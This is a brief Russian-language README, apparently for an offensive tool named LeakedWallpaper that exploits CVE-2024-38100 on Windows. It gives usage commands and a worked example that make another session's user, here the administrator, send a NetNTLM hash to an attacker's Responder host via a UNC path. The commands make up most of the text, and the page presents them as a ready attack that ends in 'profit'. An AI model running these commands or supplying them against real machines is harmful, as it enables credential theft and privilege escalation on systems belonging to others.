
Утечка NetNTLM-хэша любого пользователя. Исправлено в KB5040434
Это инструмент повышения привилегий (исправлено в CVE-2024-38100 в KB5040434), который позволяет получить NetNTLM-хэш пользователя из любого сеанса на компьютере, даже если мы работаем от непривилегированного пользователя.
.\LeakedWallpaper.exe <session> \\<KALI IP>\c$\1.jpg [-downgrade]
# Example
.\LeakedWallpaper.exe 1 \\172.16.0.5\c$\1.jpg -downgrade
Если блокируется, смотрите demo.mkv
Представьте, что на хосте есть два сеанса:
ID текущего сеанса: 2
ID целевого сеанса: 1

IP-адрес Responder: 172.16.0.5
IP-адрес Windows: 172.16.0.2

Получим NetNTLM-хэш администратора с помощью инструмента!
.\LeakedWallpaper 1 \\172.16.0.5\c$\1.jpg
Профит!
